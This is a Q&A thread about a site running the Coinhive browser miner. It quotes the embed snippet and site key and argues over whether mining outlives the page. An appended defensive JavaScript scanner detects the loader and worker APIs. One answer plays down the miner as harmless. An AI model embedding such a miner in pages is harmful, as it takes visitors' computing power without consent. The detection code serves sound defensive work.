Site with a bitcoin miner script

3

11

I found some of my users visiting a site that seemed to have a Bitcoin mining JS script in its code:

    <script src="hxxps://coin-hive.com/lib/coinhive.min.js"></script>
    <script>
      var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
      miner.start();
    </script>

My question is, with this are the users still infected even if they navigate away from the page? Do these sort of programs only work while the user has the page open in the browser?

Bacillus answered 28/9, 2017 at 19:30 Comment(5)
No, and Yes, respectively. - Molecule
Learn about Service Workers, which give some level of persistence (and can be abused to give more). - Synovitis
Thanks @SLaks, I checked the page and the JS script and can see it's not using Service Workers. It's good to know about them though for the future. - Bacillus
It uses them. Check my answer. - Straphanger
@ArtemArkhipov: You're confusing Web Workers and Service Workers. - Synovitis
11

with this are the users still infected even if they navigate away from the page?

No

Do these sort of programs only work while the user has the page open in the browser?

Yes, the script will only run on the website that includes it, while the page is open in the browser.

UPDATE:

More information about this script: https://coin-hive.com/

Coinhive offers a JavaScript miner for the Monero Blockchain (...) that you can embed in your website. Your users run the miner directly in their Browser

And https://coin-hive.com/documentation/miner

The miner runs until you explicitly stop it again or the user navigates away.

Ehling answered 28/9, 2017 at 19:38 Comment(0)
8

Coinhive does not appear to be "malware" since it does not appear to do anything particularly harmful to the user's computer. If that is the case, the users' computers were never "infected" with anything.

It is extremely common these days for websites to load tons of third party scripts and cookies in the background and do hundreds of things you are not aware of every time you use the internet. Most sites load a Google Analytics tracking script when you visit them, even though you did not authorize them to do that. But that would not be considered malware. Most sites load persistent third-party cookies that track your presence from one website to another and create a massive profile of your online habits. This is why you could be shopping for shoes on one site, and then suddenly find that Facebook is serving you ads for shoes. But that also is generally not considered malware.

In terms of "harm" or "unwanted activity", persistent tracking could be said to be more invasive than a coin mining script. The coin mining script is probably just using some of the memory and CPU power of the end user's computer, which is no different from the hundreds of other JavaScript libraries that are getting loaded in the background without your knowledge.

Praise answered 28/9, 2017 at 19:46 Comment(0)
4

I am not familiar with the coin-hive service, but the script which you have provided actually contains these lines:

    var JobThread = function() {
        this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);
        this.worker.onmessage = this.onReady.bind(this);
        // ...
    };

As you can see, it is using Workers. I did not investigate the whole script, but anyway, using web workers means that some operations can be running even after the page was closed. More information in this post.

So the very first answer to your question is YES, users can possibly be infected for some time after the page was closed (in theory, if the script is written in such a way).

But actually the script seems to be terminated very soon by the system itself. Also, the coin-hive platform is not positioned as malware and should be safe for the user's system. I don't think that you should worry about that at all.

Straphanger answered 28/9, 2017 at 19:56 Comment(0)
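
A static triage pass a defender could run over saved page source or proxy-captured script bodies, flagging the loader from the question and telling apart the two worker APIs argued about in the comments. This is an added example, not code from the original posts or from Coinhive; `triage`, the indicator names, and the service worker sample are constructed for illustration.

```javascript
// Indicators are checked against raw HTML/JS text; "persistent" marks APIs whose
// registration outlives the tab that created it.
const INDICATORS = [
  // Loader URL as posted in the question (also matches the defanged "hxxps" form).
  { id: 'coinhive-loader', persistent: false,
    re: /h(?:tt|xx)ps?:\/\/(?:[\w-]+\.)*coin-?hive\.com\/[^"'\s>]*/i },
  // Miner construction, e.g. new CoinHive.Anonymous('<site key>'); captures the key.
  { id: 'coinhive-miner', persistent: false,
    re: /new\s+CoinHive\.\w+\s*\(\s*['"]([0-9A-Za-z]+)['"]/ },
  // Dedicated Web Worker: lives only as long as the page that created it.
  { id: 'web-worker', persistent: false, re: /new\s+Worker\s*\(/ },
  // Service Worker: the registration stays with the origin after the tab closes.
  { id: 'service-worker', persistent: true,
    re: /navigator\s*\.\s*serviceWorker\s*\.\s*register\s*\(/ },
];

function triage(source) {
  const findings = [];
  for (const { id, persistent, re } of INDICATORS) {
    const m = re.exec(source);
    if (!m) continue;
    const finding = { id, persistent, match: m[0] };
    if (id === 'coinhive-miner') finding.siteKey = m[1];
    findings.push(finding);
  }
  return {
    findings,
    miner: findings.some((f) => f.id.startsWith('coinhive-')),
    survivesTabClose: findings.some((f) => f.persistent),
  };
}

// Sample 1: the snippet from the question.
const QUESTION_SNIPPET = `<script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>`;
// Sample 2: the line quoted in the last answer.
const WORKER_EXCERPT = 'this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);';
// Sample 3: constructed page script that registers a service worker.
const SW_SAMPLE = "navigator.serviceWorker.register('/sw.js');";

for (const [name, src] of Object.entries({ QUESTION_SNIPPET, WORKER_EXCERPT, SW_SAMPLE })) {
  const r = triage(src);
  console.log(name, r.findings.map((f) => f.id), 'survivesTabClose =', r.survivesTabClose);
}
```

A hit on `service-worker` is a prompt to review the origin's registrations in the browser's developer tools, not proof of mining by itself.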
